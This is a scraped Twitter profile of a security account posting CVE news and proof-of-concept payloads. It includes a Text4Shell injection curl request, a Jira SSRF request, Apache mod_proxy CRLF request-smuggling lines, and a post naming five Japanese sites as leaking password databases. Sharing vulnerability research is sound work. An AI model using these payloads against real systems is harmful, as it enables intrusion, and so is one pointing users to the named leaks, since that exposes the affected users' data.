RIVER (@wugeej) 's Twitter Profile
RIVER

@wugeej

CERT South Korea & Japan

ID: 109505294

calendar_today29-01-2010 08:04:03

8,8K Tweet

11,11K Followers

75 Following

RIVER (@wugeej) 's Twitter Profile Photo

[BugTales] Huawei smartphones UnZiploc: From 0-click To Platform Compromise CVE-2021-40045 CVE-2021-40055 CVE-2021-37107 CVE-2021-37109 CVE-2021-37115 CVE-2021-39986 CVE-2021-39991 CVE-2021-39992 labs.taszk.io/articles/post/…

[BugTales] Huawei smartphones UnZiploc: From 0-click To Platform Compromise

CVE-2021-40045
CVE-2021-40055
CVE-2021-37107
CVE-2021-37109
CVE-2021-37115
CVE-2021-39986
CVE-2021-39991
CVE-2021-39992

labs.taszk.io/articles/post/…
RIVER (@wugeej) 's Twitter Profile Photo

Japan Database Leaking Password in not full hash, useless jrchri.kuma-u.jp addresscode.jp yano.co.jp bts-official.jp twinkle-mobile.co.jp

Japan Database Leaking

Password in not full hash, useless

 jrchri.kuma-u.jp
addresscode.jp
yano.co.jp
bts-official.jp
twinkle-mobile.co.jp
RIVER (@wugeej) 's Twitter Profile Photo

Rolling Pwn Attack unlock and remotely start virtually all models of Honda cars · Honda X-RV · Honda C-RV · Honda Accord · Honda Odyssey · Honda Inspire 2021 · Honda Fit 2022 · Honda Civic 2022 · Honda VE-1 2022 · Honda Breeze 2022 rollingpwn.github.io/rolling-pwn/

RIVER (@wugeej) 's Twitter Profile Photo

CVE-2022-26135 - Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server POST /rest/nativemobile/1.0/batch HTTP/2 .... {"requests":[{"method":"GET","location":"example.com"}]} github.com/assetnote/jira…

CVE-2022-26135 - Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server

POST /rest/nativemobile/1.0/batch HTTP/2
....
{"requests":[{"method":"GET","location":"<a href="/example/">example</a>.com"}]}

github.com/assetnote/jira…
Mr.programmer (@freeprogrammers) 's Twitter Profile Photo

Good Search Engines for Pentesters #Pentesting #CyberSec #cyberawarness #cybersecuritytips #informationsecurity #infosec #ethicalhacking #bugbounty #bugbountytips #aws

Good Search Engines for Pentesters

#Pentesting #CyberSec #cyberawarness #cybersecuritytips #informationsecurity #infosec #ethicalhacking #bugbounty #bugbountytips #aws
RIVER (@wugeej) 's Twitter Profile Photo

Apache Text4Shell (CVE-2022-42889) PoC curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D sysdig.com/blog/cve-2022-… github.com/ClickCyber/cve…

Apache Text4Shell (CVE-2022-42889)

PoC
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D

sysdig.com/blog/cve-2022-…
github.com/ClickCyber/cve…
RIVER (@wugeej) 's Twitter Profile Photo

CVE PoC - Find almost every publicly available CVE Proof-of-Concept. by Trickest github.com/trickest/cve #cve #poc #vulnerability #vulnerabilities #exploit #infosec #cybersecurity

RIVER (@wugeej) 's Twitter Profile Photo

[PoC] [CVE-2023-25690] Apache HTTP Server mod_proxy vul CLRF Injection GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1 Host: Header Injection GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1 Host: 1.1.1.1 github.com/dhmosfunk/CVE-…